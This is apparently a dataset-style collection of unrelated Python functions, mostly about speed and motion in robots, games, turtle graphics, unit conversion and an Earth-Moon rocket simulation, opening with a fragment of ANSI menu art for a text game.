\"+self.ESC+\"1;37;47m\"+self.A178+self.ESC+\"C\"+self.A176+self.ESC+\"0m\"+self.A223+self.ESC+\"1;33m\"+self.A220+self.ESC+\"43m\"+self.A178+self.ESC+\"40m\"+self.A223+self.ESC+\"C\"+self.ESC+\"43m\"+self.A176+self.ESC+\"0;33m\"+self.A223+self.A220+self.ESC+\"C\"+self.ESC+\"1;37;47m\"+self.A177+self.A177+self.A176+self.ESC+\"0m\"+self.A219+self.A223+self.ESC+\"1;33m\"+self.A220+self.ESC+\"43m\"+self.A178+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1;43m\"+self.A176+self.ESC+\"0;33m\"+self.A220+self.ESC+\"37m\"+self.A223+self.ESC+\"1;30m\"+self.A219+self.ESC+\"C\"+self.A178+self.ESC+\"6C\"+self.ESC+\"0;34m[\"+self.ESC+\"1mB\"+self.ESC+\"0;34m]\"+self.ESC+\"1muy\"+self.ESC+\"CWeapon\"+self.ESC+\"30C\"+self.ESC+\"0;34m\"+self.A219+self.ESC+\"30;44m\"+self.A177+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A178+self.ESC+\"C \"+self.ESC+\"1;37;47m\"+self.A177+self.ESC+\"2C\"+self.ESC+\"40m\"+self.A223+self.ESC+\"33m\"+self.A219+self.A220+self.ESC+\"0;33m\"+self.A178+self.A223+self.ESC+\"37m\"+self.A220+self.A219+self.A220+self.ESC+\"1;47m\"+self.A177+self.A176+self.A176+self.ESC+\"0m\"+self.A219+self.A220+self.ESC+\"1m\"+self.A223+self.ESC+\"0m\"+self.A220+self.A220+self.ESC+\"1;33m\"+self.A223+self.A220+self.A220+self.ESC+\"43m\"+self.A177+self.ESC+\"0;33m\"+self.A223+self.ESC+\"2C\"+self.ESC+\"1;30m\"+self.A219+self.ESC+\"6C\"+self.ESC+\"0;34m[\"+self.ESC+\"1mS\"+self.ESC+\"0;34m]\"+self.ESC+\"1mell\"+self.ESC+\"CWeapon\"+self.ESC+\"29C\"+self.ESC+\"0;34m\"+self.A219+self.ESC+\"30;44m\"+self.A177+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A176+self.A176+self.ESC+\"C 
\"+self.ESC+\"1;37;47m\"+self.A176+self.ESC+\"C\"+self.ESC+\"0m\"+self.A223+self.A220+self.A220+self.A220+self.A219+self.ESC+\"1;47m\"+self.A176+self.A176+self.A176+self.A176+self.ESC+\"0;30;47m\"+self.A176+self.ESC+\"37;40m\"+self.A219+self.A219+self.A219+self.A219+self.ESC+\"1;30;47m\"+self.A176+self.ESC+\"0m\"+self.A219+self.A219+self.A220+self.A220+self.ESC+\"1;30m\"+self.A220+self.A223+self.ESC+\"C\"+self.A219+self.ESC+\"7C\"+self.ESC+\"0;34m[\"+self.ESC+\"1mY\"+self.ESC+\"0;34m]\"+self.ESC+\"1mour\"+self.ESC+\"CStats\"+self.ESC+\"30C\"+self.ESC+\"0;34m\"+self.A219+self.ESC+\"30;44m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A176+self.ESC+\"C \"+self.ESC+\"37m\"+self.A223+self.A220+self.ESC+\"C\"+self.A223+self.A223+self.A219+self.A219+self.A219+self.A219+self.A219+self.ESC+\"30;47m\"+self.A220+self.A177+self.ESC+\"37;40m\"+self.A219+self.A219+self.A219+self.ESC+\"1;30;47m\"+self.A220+self.A220+self.A178+self.ESC+\"40m\"+self.A223+self.A223+self.ESC+\"C\"+self.A220+self.A223+self.ESC+\"0;34m\"+self.A176+self.ESC+\"7C[\"+self.ESC+\"1mR\"+self.ESC+\"0;34m]\"+self.ESC+\"1meturn\"+self.ESC+\"Cto\"+self.ESC+\"CTown\"+self.ESC+\"25C\"+self.ESC+\"0;34m\"+self.A222+self.ESC+\"1;44m\"+self.A177+self.ESC+\"0;30;44m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A220+self.ESC+\"1;44m\"+self.A176+self.ESC+\"0;34m\"+self.A220+self.ESC+\"C\"+self.A178+self.A220+self.ESC+\"37m\"+self.A223+self.A223+self.A220+self.A220+self.ESC+\"C\"+self.A223+self.A223+self.A223+self.ESC+\"1;30;47m\"+self.A176+self.A177+self.A219+self.ESC+\"40m\"+self.A223+self.A223+self.A223+self.ESC+\"C\"+self.A220+self.A220+self.A223+self.A223+self.ESC+\"C\"+self.ESC+\"0;34m\"+self.A220+self.A219+self.A176+self.ESC+\"47C\"+self.A219+self.ESC+\"1;44m\"+self.A176+self.ESC+\"0;30;44m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A223+self.ESC+\"C\"+self.A220+self.A254+self.A178+self.A219+self.A219+self.A220+self.A220+self.ESC+\"37m\"+self.A223+self.A223+self.A223+self.A220+self.ESC+\"C\"+self.ESC+\"1;30m\"+self.A223+self.ESC+\"C\"+self.A220+self.A223+self.A223+self.A223+self.ESC+\"C\"+self.ESC+\"0;34m\"+self.A176+self.A176+self.A223+self.A178+self.A178+self.A176+self.ESC+\"2C\"+self.ESC+\"1;44m\"+self.A176+self.ESC+\"0;34m\"+self.A223+self.A223+self.A223+self.A178+self.A223+self.A223+self.ESC+\"C\"+self.A223+self.A178+self.A223+self.ESC+\"C\"+self.A223+self.A223+self.ESC+\"C\"+self.A223+self.A176+self.ESC+\"C\"+self.A223+self.ESC+\"C\"+self.A223+self.A223+self.ESC+\"C\"+self.A223+self.A223+self.ESC+\"30;44m\"+self.A177+self.ESC+\"19C\"+self.ESC+\"34;40m\"+self.A223+self.A223+self.A223+self.A223+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A177+self.A178+self.A219+self.A220+self.ESC+\"C\"+self.A176+self.A223+self.A178+self.A178+self.A178+self.A178+self.A223+self.A176+self.ESC+\"C\"+self.ESC+\"37m\"+self.A223+self.ESC+\"1;30m\"+self.A220+self.A223+self.ESC+\"C\"+self.ESC+\"0;34m\"+self.A223+self.A178+self.A176+self.ESC+\"4C\"+self.A176+self.ESC+\"C\"+self.A220+self.A219+self.ESC+\"30;44m\"+self.A176+\" \"+self.ESC+\"34;40m\"+self.A254+self.ESC+\"37m 
\"+self.ESC+\"34m\"+self.A220+self.ESC+\"30;44m\"+self.A176+self.A178+self.ESC+\"34;40m\"+self.A219+self.A219+self.A219+self.ESC+\"30;44m\"+self.A176+self.ESC+\"34;40m\"+self.A219+self.A220+self.A219+self.A219+self.A219+self.A219+self.A219+self.A222+self.A219+self.A219+\"\\r\\n\"\n\t\treturn thismsg", "def do_light(self,count):\n if (count == ''):\n count=\"1\"\n for i in range(0,int(count)):\n light=RCtime(12)\n print \"*\"*(light/4000)+\": %d\" % light", "def ChangeWindSpeed(self,speed):\n self.problem.ChangeWindSpeed(speed)", "def u_turn(self, direction, diameter_in):\n \n# pdb.set_trace()\n # Calculate radius of turn for the inside wheel.\n r_in = diameter_in / 2\n\n # Outside radius is 20 inches from inside radius.\n r_out = r_in + MuleBot.WHEEL_BASE_LENGTH\n \n # Outside travel distance\n travel = r_out * 3.14159\n travel_revolutions = travel / MuleBot.CIRCUM_IN\n \n r_ratio = r_out / r_in\n #r_ratio_half = r_ratio / 2\n\n speed_multiplier = MuleBot.MAX_RPM / r_ratio\n\n outside_rpm = r_ratio * speed_multiplier\n inside_rpm = speed_multiplier\n \n \n # \n # minutes at outside_rpm\n minutes = travel_revolutions / outside_rpm\n seconds = minutes * MuleBot.SECONDS_PER_MINUTE\n \n # Something isn't quite perfect.\n if direction == 'left':\n if diameter_in < 25:\n seconds -= 1\n else:\n seconds -= 2\n else:\n if diameter_in < 25:\n seconds += 1\n else:\n seconds += 2\n\n if direction == 'left':\n v_l = self.rpm_to_rps(inside_rpm)\n v_r = self.rpm_to_rps(outside_rpm)\n else:\n v_r = self.rpm_to_rps(inside_rpm)\n v_l = self.rpm_to_rps(outside_rpm)\n\n #print(\"2inside: rpm: \", inside_rpm)\n #print(\"2outside: rpm: \", outside_rpm)\n \n #print(\"2.1: v_l: \", v_l)\n #print(\"2.1: v_r: \", v_r)\n\n # Set wheel drive rates.\n self.set_wheel_drive_rates(v_l, v_r)\n\n # Sleep during the turn.\n time.sleep(seconds)\n\n # Stop\n self.stop()\n \n # Move forward 24 inches.\n self.forward(24)", "def chacha(self):\n self.right()\n time.sleep(2)\n self.stop()\n self.back()\n time.sleep(1)\n self.servo(1000)\n time.sleep(1)\n self.stop()\n self.fwd()\n time.sleep(1)\n self.stop()\n self.servo(2000)\n time.sleep(1)\n self.stop()\n self.left()\n time.sleep(2)\n self.stop()", "def _speedDiff(self, position, speed, action):\n return (action/(1 + self._hill_diff(position)**2)\n - 9.81 * self._hill_diff(position) /\n (1 + self._hill_diff(position)**2)\n - ((self._hill_diff(position) * self._hill_diff_diff(position)) \n * (speed**2))/(1 + self._hill_diff(position)**2))", "def setspeed(speed):\n if speed is None:\n click.echo(\"speed value is required\")\n raise click.Abort()\n\n for fan in range(_wrapper_get_num_fans()):\n status = _wrapper_set_fan_speed(fan, speed)\n if not status:\n click.echo(\"Failed\")\n sys.exit(1)\n\n click.echo(\"Successful\")", "def setStartSpeed(self, pulses_per_sec):\n cmd_string = 'v{0}'.format(pulses_per_sec)\n self.sim_speed_change = True\n self.cmd_chain += cmd_string", "def set_speed(self, speed_mps):\n speed_cmd = CommandLongRequest()\n speed_cmd.command = 178\n speed_cmd.param1 = 1\n speed_cmd.param2 = speed_mps\n speed_cmd.param3 = -1\n speed_cmd.param4 = 0\n\n rospy.loginfo(\n CBLUE2 + \"Setting speed to {}m/s\".format(str(speed_mps)) + CEND)\n response = self.command_client(speed_cmd)\n\n if response.success:\n rospy.loginfo(\n CGREEN2 + \"Speed set successfully with code {}\".format(str(response.success)) + CEND)\n rospy.loginfo(\n CGREEN2 + \"Change Speed result was {}\".format(str(response.result)) + CEND)\n return 0\n else:\n rospy.logerr(\n CRED2 + \"Speed set failed 
with code {}\".format(str(response.success)) + CEND)\n rospy.logerr(\n CRED2 + \"Speed set result was {}\".format(str(response.result)) + CEND)\n return -1", "def move(self):\n self.position += self.speed", "def twist_to_rover_command(linear, angular):\n\n if linear > max_speed:\n linear = max_speed\n elif linear < -max_speed:\n linear = -max_speed\n\n if angular > max_angular_speed:\n angular = max_angular_speed\n elif angular < -max_angular_speed:\n angular = -max_angular_speed\n\n linear_speed = linear / max_speed # linear_speed should now be in [-1, 1]\n angular_speed = angular / max_angular_speed # angular_speed should now [-1,1]\n\n linear_val = linear_speed * max_throttle\n angular_val = angular_speed * max_steering\n\n throttle = 0\n steering = 0\n\n if linear_val == 0:\n throttle = abs(angular_val)\n if angular_val < 0:\n steering = 49\n elif angular_val > 0:\n steering = -49\n else:\n throttle = linear_val\n steering = 0\n\n return str(round(throttle)) + ':' + str(round(steering))", "def tweak_base(*args):\n\n up = utils.arrow_up\n down = utils.arrow_down\n left = utils.arrow_left\n right = utils.arrow_right\n shift_up = utils.shift_arrow_up\n shift_down = utils.shift_arrow_down\n plus = utils.plus\n minus = utils.minus\n scale = 0.1\n abs_status = '{}: {:.4f}'\n exp_status = '{}: {:.4e}'\n\n if len(args) == 1:\n move_keys = (left, right)\n scale_keys = (up, down, plus, minus, shift_up, shift_down)\n elif len(args) == 2:\n move_keys = (left, right, up, down)\n scale_keys = (plus, minus, shift_up, shift_down)\n\n def show_status():\n if scale >= 0.0001:\n template = abs_status\n else:\n template = exp_status\n text = [template.format(mot.name, mot.wm()) for mot in args]\n text.append(f'scale: {scale}')\n print('\\x1b[2K\\r' + ', '.join(text), end='')\n\n def usage():\n print() # Newline\n if len(args) == 1:\n print(\" Left: move x motor backward\")\n print(\" Right: move x motor forward\")\n print(\" Up or +: scale*2\")\n print(\" Down or -: scale/2\")\n else:\n print(\" Left: move x motor left\")\n print(\" Right: move x motor right\")\n print(\" Down: move y motor down\")\n print(\" Up: move y motor up\")\n print(\" + or Shift_Up: scale*2\")\n print(\" - or Shift_Down: scale/2\")\n print(\" Press q to quit.\"\n \" Press any other key to display this message.\")\n print() # Newline\n\n def edit_scale(scale, direction):\n \"\"\"Function used to change the scale.\"\"\"\n if direction in (up, shift_up, plus):\n scale = scale*2\n elif direction in (down, shift_down, minus):\n scale = scale/2\n return scale\n\n def movement(scale, direction):\n \"\"\"Function used to know when and the direction to move the motor.\"\"\"\n try:\n if direction == left:\n args[0].umvr(-scale, log=False, newline=False)\n elif direction == right:\n args[0].umvr(scale, log=False, newline=False)\n elif direction == up:\n args[1].umvr(scale, log=False, newline=False)\n elif direction == down:\n args[1].umvr(-scale, log=False, newline=False)\n except Exception as exc:\n logger.error('Error in tweak move: %s', exc)\n logger.debug('', exc_info=True)\n\n start_text = ['{} at {:.4f}'.format(mot.name, mot.wm()) for mot in args]\n logger.info('Started tweak of ' + ', '.join(start_text))\n\n # Loop takes in user key input and stops when 'q' is pressed\n is_input = True\n while is_input is True:\n show_status()\n inp = utils.get_input()\n if inp in ('q', None):\n is_input = False\n elif inp in move_keys:\n movement(scale, inp)\n elif inp in scale_keys:\n scale = edit_scale(scale, inp)\n else:\n usage()\n print()\n 
logger.info('Tweak complete')", "def set_speed(self, speed):\n self._kernel.set_speed(float(speed))", "def match_car_speed(self, fast_car, slow_car):\n fast_car.current_speed = slow_car.current_speed", "def set_motor_speed(self, speed=0.0):\r\n self.target_speed = speed", "def convert_speed(self, event):\n try:\n #Compare other unit to one unit(meters/second)\n current_value, current_unit = float(\"0\" + str(self.v.get())), self.dropdown.get()\n unit_comp = {\"Mach number\": 340.2933, \"Nm/24hr\": 0.021435, \"centimeters/minute\": 0.000167, \"centimeters/second\": 0.01, \"feet/hour\": 8.5e-05, \"feet/minute\": 0.00508, \"feet/second\": 0.3048, \"inches/minute\": 0.000423, \"inches/second\": 0.0254, \"kilometers/hour\": 0.277778, \"kilometers/second\": 1000.0, \"knots\": 0.514444, \"meters/hour\": 0.000278, \"meters/minute\": 0.016667, \"meters/second\": 1.0, \"miles/hour\": 0.44704, \"miles/minute\": 26.8224, \"miles/second\": 1609.344, \"nautical miles/hour\": 0.514444, \"speed of light\": 299790000.0, \"speed of sound\": 343.0, \"yards/hour\": 0.000254, \"yards/minute\": 0.01524, \"yards/second\": 0.9144}\n value_comp, printer = current_value * unit_comp[current_unit], \"\"\n unit_list = sorted(unit_comp.keys())\n unit_list.remove(current_unit)\n for unit in unit_list:\n printer += \"To %s \" % unit + \" \" * (max([len(i) for i in unit_list]) - len(unit)) + str(value_comp / unit_comp[unit]) + [\"\", \"\\n\"][unit_list[-1] != unit]\n except ValueError: #In case user enter the other type of value, not Int or Float\n printer = \"Value is invalid.\"\n self.print_text(printer)", "def increase_speed(self):\n self.ship_speed*=self.speedup_scale\n self.bullet_speed*=self.speedup_scale\n self.alien_speed*=self.speedup_scale\n self.alien_points=int(self.alien_points*self.score_scale)\n print(self.alien_points)", "def set_speed_manual(self, command_logger=None):\r\n pass", "def set_speed(self, speed):\n self.device.set_speed(speed)\n return \"OK\"", "def move_friendly(self):\n self.friendly_pos[0]+=self.x_speed\n self.friendly_pos[1]+=self.y_speed", "def setSpeedEngines(leftSpeed: int, rightSpeed: int):\n pass", "def increase_speed(self):\n self.covid_horizontal_speed_factor *= self.speedup_scale\n self.bullet_speed_factor *= self.speedup_scale\n self.hero_speed_factor *= self.speedup_scale", "def smooth_drive(self, distance, linear_speed):\n ### EXTRA CREDIT\n # TODO\n pass # delete this when you implement your code", "def set_gripper_speed(self, speed, **kwargs):\r\n return self._arm.set_gripper_speed(speed, **kwargs)", "def change_speed(self, speed):\n\n self.__corrds[self.X_SPEED], self.__corrds[self.Y_SPEED] = speed\n if type(speed) != tuple:\n raise ValueError('speed must be a tuple of the form (sp_x, sp_y)')", "async def async_set_speed(self, speed: str) -> None:\n switch_states = self._relay_state_map.get(speed)\n if not switch_states:\n LOG.warning(\n f\"LUNOS '{self._name}' DOES NOT support speed '{speed}'; ignoring speed change.\"\n )\n return\n\n # save the pending relay states (in case multiple changes are queued up in\n # event loop only the most recent should \"win\")\n self._pending_relay_w1 = switch_states[0]\n self._pending_relay_w2 = switch_states[1]\n\n # wait after any relay was last changed to avoid LUNOS controller misinterpreting toggles\n #\n # FIXME: there really should be a queue of changes with a delay between each before application\n # instead of this (and clearing out of old changes IF any are queued up). 
This existing\n # implementation here does not work if someone starts clicking changes again and again\n await self._throttle_state_changes(MINIMUM_DELAY_BETWEEN_STATE_CHANGES)\n\n if self._pending_relay_w1 is not None:\n LOG.info(\n f\"Changing LUNOS '{self._name}' speed: {self._current_speed} -> {speed}\"\n )\n await self.set_relay_switch_state(self._relay_w1, self._pending_relay_w1)\n await self.set_relay_switch_state(self._relay_w2, self._pending_relay_w2)\n self._pending_relay_w1 = self._pending_relay_w2 = None\n\n # update our internal state immediately (instead of waiting for callback relays have changed)\n self._update_speed(speed)", "def turtle_movement(turtle_shape, bg_color, turtle_color, turtle_speed):\n turtle_name = initialize(turtle_shape, bg_color,\n turtle_color, turtle_speed)\n\n for i in range(36):\n for i in range(4):\n turtle_name.forward(200)\n turtle_name.right(90)\n turtle_name.right(10)", "def tick():\n move_balls(targets_speed)\n move_super_balls(targets_speed * 2)", "def speed(self, speed=None):\n speeds = {'fastest':0, 'fast':10, 'normal':6, 'slow':3, 'slowest':1 }\n if speed is None:\n return self._speed\n if speed in speeds:\n speed = speeds[speed]\n elif 0.5 < speed < 10.5:\n speed = int(round(speed))\n else:\n speed = 0\n self.pen(speed=speed)", "def set_animation_speed(self, speed):\n self.m_animation_speed = self.calculate_animation_speed(speed)", "def moonPass(deltaTime, duration, startingX, startingY, startingVelocityX, startingVelocityY, massRocket, rocketForce, rocketTransferDuration, moonStartAngle, manual = False):\r\n global rocketStage # initialising the global variables\r\n global massMoon\r\n \r\n moonPosX = earthMoonDistance*math.sin(math.pi*moonStartAngle/180) #m Here we have the x coordinate of the moon\r\n moonPosY = earthMoonDistance*math.cos(math.pi*moonStartAngle/180) #m Here the Y coordinate\r\n moonVelocity = math.sqrt(G*massEarth/earthMoonDistance) #the velocity of the moon as calculated by the Vis-Visa equation for a circle\r\n velocityXMoon = moonVelocity*math.cos(math.pi*moonStartAngle/180) # here we set the x and y velocity components of the moon's starting conditions\r\n velocityYMoon = -moonVelocity*math.sin(math.pi*moonStartAngle/180)\r\n \r\n h = deltaTime # this is the time step size, which can be altered by the user.\r\n time = [] # creating an empty array where the values of time are stored.\r\n time.append(0) #setting the first value in the time array to 0s\r\n kPos = [[0 for x in range(4)] for y in range(2)] #here we create multi-demensional arrays, 4x2, where the values for k in the runge kutta method are stored. 
This array is dedicated to the k's for position.\r\n kV = [[0 for x in range(4)] for y in range(2)] # same as the line above but for k's used in the velocity calculations.\r\n velocityX = [] #creating more empty arrays, for velocity, position and speed.\r\n velocityY = []\r\n posX = []\r\n posY = []\r\n speed = []\r\n \r\n velocityX.append(startingVelocityX) #here we append the first value of the array to the starting values defined by the user.\r\n velocityY.append(startingVelocityY)\r\n posX.append(startingX)\r\n posY.append(startingY)\r\n i = 0 # i is the counter used in the while loop below, to keep track of the number of iterations performed.\r\n speed.append(math.sqrt(velocityX[i]**2+velocityY[i]**2)) #here we append the starting value for the scalar value speed.\r\n \r\n moonPosXArray = [] #initialising arrays for the moon's position and velocity\r\n moonPosYArray = []\r\n velocityXMoonArray = []\r\n velocityYMoonArray = [] \r\n moonPosXArray.append(moonPosX)\r\n moonPosYArray.append(moonPosY)\r\n \r\n startingAngle = 180*math.atan(startingY/-startingX)/math.pi #calculate starting angle\r\n orbitalRadius = [] #Initialise this empty array which will hold the distace from Earth\r\n moonDistance = []\r\n totalEnergy = []\r\n angle = [] # This array will hold the anglular position of the projectile from Earth with 0 degrees pointing towards the starting position.\r\n orbitalRadius.append((math.sqrt(startingX**2+startingY**2))) #here we append the starting orbital radius at the starting position\r\n moonDistance.append((math.sqrt((startingX-moonPosX)**2+(startingY-moonPosY)**2)))\r\n angle.append(startingAngle) #here we append the starting angle\r\n totalEnergy.append(0.5*(startingVelocityX**2+startingVelocityY**2)-G*massEarth/(orbitalRadius[0])-G*massMoon/(moonDistance[0])) \r\n orbitCount = 0 # uneeded\r\n looped = True # unneeded\r\n orbitLoop = -1 # unndeeded\r\n negativeSection = 0 # In order to caculate the anglular position in 360 degrees circles, then 180 degrees needs to be added on to the trigonometric equation in certian quatiles. This variable contains the correct factor.\r\n \r\n rocketStage = 1 #initialise the stage of the projectile flight to 1\r\n \r\n while rocketStage != 6 and time[i]<duration: # while the rocket has completed all of the stages of flight and the timer hasn't run out for maximum allowed flight length.\r\n #k1s\r\n kPos[0][0] = velocityX[i] # this value is k1 for the x position. It is just the velocity of the rocket at its current position.\r\n kPos[1][0] = velocityY[i] #this value is k1 for the y position\r\n kV[0][0] = moonCalcX(posX[i], posY[i], moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce) #this value is k1 for the x velocity. 
At its current position what is the acceleration of the projectile\r\n kV[1][0] = moonCalcY(posX[i], posY[i], moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce) # this value is k1 for the y velocity\r\n \r\n #k2s\r\n kPos[0][1] = velocityX[i] + h*kV[0][0]/2 #what would its velocity be if it carried on at its initial acceleration (calculated in k1 for x velocity) for half a time step\r\n kPos[1][1] = velocityY[i] + h*kV[1][0]/2\r\n kV[0][1] = moonCalcX(posX[i] + h*kPos[0][0]/2, posY[i] + h*kPos[1][0]/2, moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce) # if it continued at the velocity in k2 for x position for half a time step what would the acceleration on the projectile be.\r\n kV[1][1] = moonCalcY(posX[i] + h*kPos[0][0]/2, posY[i] + h*kPos[1][0]/2, moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce)\r\n \r\n #k3s\r\n kPos[0][2] = velocityX[i] + h*kV[0][1]/2 # if it carried on at the acceleration calculated for k2 in x velocity for half a time step, what would its velocity be\r\n kPos[1][2] = velocityY[i] + h*kV[1][1]/2\r\n kV[0][2] = moonCalcX(posX[i] + h*kPos[0][1]/2, posY[i] + h*kPos[1][1]/2, moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce) # if carried on at the velocity calculated in k2 for half a time step then what would its accelaration be\r\n kV[1][2] = moonCalcY(posX[i] + h*kPos[0][1]/2, posY[i] + h*kPos[1][1]/2, moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce)\r\n \r\n #k4s\r\n kPos[0][3] = velocityX[i] + h*kV[0][2] # if it carried on at the acceleration calcualted in k3 fro a whole timestep, then what would its velocity be \r\n kPos[1][3] = velocityY[i] + h*kV[1][2]\r\n kV[0][3] = moonCalcX(posX[i] + h*kPos[0][2], posY[i] + h*kPos[1][2], moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce) #if it continued at the velocity calculated in k3 for a whole time step, then what would its accelaration be\r\n kV[1][3] = moonCalcY(posX[i] + h*kPos[0][2], posY[i] + h*kPos[1][2], moonPosX, moonPosY, angle[i], velocityX[i], velocityY[i], massRocket, rocketForce)\r\n \r\n time.append(time[i]+h) #here the new times step is appended to the time array\r\n velocityX.append(velocityX[i]+(h/6)*(kV[0][0]+2*kV[0][1]+2*kV[0][2]+kV[0][3])) # the velocity in x is appended, after combining the ks for velocity in x\r\n velocityY.append(velocityY[i]+(h/6)*(kV[1][0]+2*kV[1][1]+2*kV[1][2]+kV[1][3])) # the velocity in y is appended, after combining the ks for velocity in y\r\n posX.append(posX[i]+(h/6)*(kPos[0][0]+2*kPos[0][1]+2*kPos[0][2]+kPos[0][3])) # the x position is appended, after combinging the ks for x position\r\n posY.append(posY[i]+(h/6)*(kPos[1][0]+2*kPos[1][1]+2*kPos[1][2]+kPos[1][3])) # the y position is appended, after combinging the ks for y position\r\n speed.append(math.sqrt(velocityX[i]**2+velocityY[i]**2)) # the speed is calculated and appended, by finding the magnitude of the velocity in the x-y plane\r\n i +=1 # i is incremented by 1\r\n \r\n if manual == False: # if the moon is not stationary\r\n moonPosX, moonPosY, velocityXMoon, velocityYMoon = dynamicMoon(moonPosX, moonPosY, velocityXMoon, velocityYMoon, h) # call the function to find the position and velocity of the moon.\r\n moonPosXArray.append(moonPosX) #add the values to the relevent arrays\r\n moonPosYArray.append(moonPosY)\r\n velocityXMoonArray.append(velocityXMoon)\r\n velocityYMoonArray.append(velocityYMoon)\r\n \r\n \r\n if 
time[i-1]+h > duration and manual == True: # if we come to the end of the simulation\r\n rocketStage == 6\r\n \r\n orbitalRadius.append(math.sqrt(posX[i]**2+posY[i]**2)) # the orbital radius is calculated and appended\r\n moonDistance.append(math.sqrt((posX[i]-moonPosX)**2+(posY[i]-moonPosY)**2)) # calculating the distance to the moon\r\n totalEnergy.append(0.5*(velocityX[i]**2+velocityY[i]**2)-G*massEarth/(orbitalRadius[i])-G*massMoon/(moonDistance[i])) # the total energy at each time step is calculated by summing the gravitational potential with the kinetic \r\n if posX[i] > 0: # if the x coordinate of its position in positive (remember Earth is at (0,0))\r\n negativeSection = 1 \r\n elif posY[i] < 0: # if the y coordinate of its position is negative\r\n negativeSection = 2\r\n else:\r\n negativeSection = 0\r\n angle.append(180*math.atan(posY[i]/-posX[i])/math.pi + 180*negativeSection) # calculate and append the angle, adding on the correct factor of 180 to create the 360 degree circle\r\n \r\n if manual == True and orbitalRadius[i] <= earthRadius: # if a collision with Earth is detected\r\n rocketStage = 6 # stop the simulation\r\n print(\"Collision with Earth Detected\")\r\n \r\n if manual == True and moonDistance[i] <= moonRadius: #if a collision with the moon is detected\r\n rocketStage = 6 # stop the simulation\r\n print(\"Collision with Moon Detected\")\r\n \r\n if manual == False: # all the different stages for the automatic simulation, each different stage corresponds to the force that needs to be applied on the rocket.\r\n if i > 1: # if there has been more than one iteration of the while loop\r\n if angle[i]-angle[i-1] < 0 and rocketStage == 2: #if the angle jumps from 360 degrees to 0 which it will do on every complete circle.\r\n rocketStage = 2.5 \r\n if angle[i]-angle[i-1] < 0 and rocketStage == 4:#if the angle jumps from 360 degrees to 0 which it will do on every complete circle.\r\n rocketStage = 4.5\r\n if angle[i]-angle[i-1] < 0 and rocketStage == 5:#if the angle jumps from 360 degrees to 0 which it will do on every complete circle.\r\n rocketStage = 5.25\r\n if angle[i]-angle[i-1] < 0 and rocketStage == 5.75:#if the angle jumps from 360 degrees to 0 which it will do on every complete circle.\r\n rocketStage = 6\r\n if rocketStage == 1 and angle[i]/360 > 1-rocketTransferDuration/2: #if rocket stage equals 1 and the anle where the rockets come on has been exceeded\r\n rocketStage = 2\r\n if rocketStage == 2.5 and angle[i]/360 > rocketTransferDuration/2: #if rocket stage equals 2.5 and the anle where the rockets go off has been exceeded\r\n rocketStage = 3\r\n if rocketStage == 3 and angle[i]/360 > 0.75-rocketTransferDuration/48: #if rocket stage equals 3 and the anle where the rockets come on has been exceeded\r\n rocketStage = 4\r\n if rocketStage == 4 and angle[i]/360 > 0.75+rocketTransferDuration/48: #if rocket stage equals 4.5 and the anle where the rockets go off has been exceeded\r\n rocketStage = 5\r\n if rocketStage == 5.25 and angle[i]/360 > 0.25-rocketTransferDuration/3.4:\r\n rocketStage = 5.5\r\n if rocketStage == 5.5 and angle[i]/360 > 0.25+rocketTransferDuration/3.4:\r\n rocketStage = 5.75\r\n\r\n return posX, posY, speed, time, totalEnergy, moonPosXArray, moonPosYArray, velocityXMoonArray, velocityYMoonArray", "def changeSpeed(self, speed, accel):\n\t\t\n max_speed = 1000\n min_speed = 0\n \n # limit max speed\n if speed >= max_speed:\n speed = max_speed\n \n # limit min speed\n if speed <= min_speed:\n speed = min_speed\n \n command = 
struct.pack(\"<BHHB\", 0x24, speed, accel, 0x01)\n self.sendCommand(command)", "def steer(direction):\n if direction == 1:\n steerMotor.run(Adafruit_MotorHAT.FORWARD)\n steerMotor.setSpeed(255)\n if direction == -1:\n steerMotor.run(Adafruit_MotorHAT.BACKWARD)\n steerMotor.setSpeed(255)\n if direction == 0:\n steerMotor.setSpeed(0)\n steerMotor.run(Adafruit_MotorHAT.RELEASE)", "def speed(n):\n turtleTmp.speed(max(1, min(n, 10)))", "def set_speed(self, speed, motor):\n self.driver.set_speed(speed, motor)\n self.last_control = time.time()", "def set_speed(self, speed, ports='ABCD'):\n\n speed += self.avg_speed\n if self.inverted:\n speed = -speed\n\n if speed > self.margin:\n speed = self.margin\n elif speed < -self.margin:\n speed = self.margin\n\n for p in ports:\n if self.motors[p].connected:\n self.motors[p].run_forever(speed_sp=speed, speed_regulation=True)\n else:\n print(\"Cant run motor on\", p, \"- not connected\")", "def on_speed_change(self, event) -> None:\r\n\r\n speed_level = int(self.speed_scale.get())\r\n self.animator.time_per_gen = self.TIMES_PER_GEN[speed_level]", "def move(self, *ms):\n\n # Map cube notation to corresponding clockwise movements.\n mmap = {\n 'L': (2, -1, -1), 'M': (2, 0, -1), 'R': (2, 1, 1),\n 'U': (1, -1, -1), 'E': (1, 0, 1), 'D': (1, 1, 1),\n 'F': (0, -1, -1), 'S': (0, 0, -1), 'B': (0, 1, 1),\n 'X': (2, 2, 1), 'Y': (1, 2, -1), 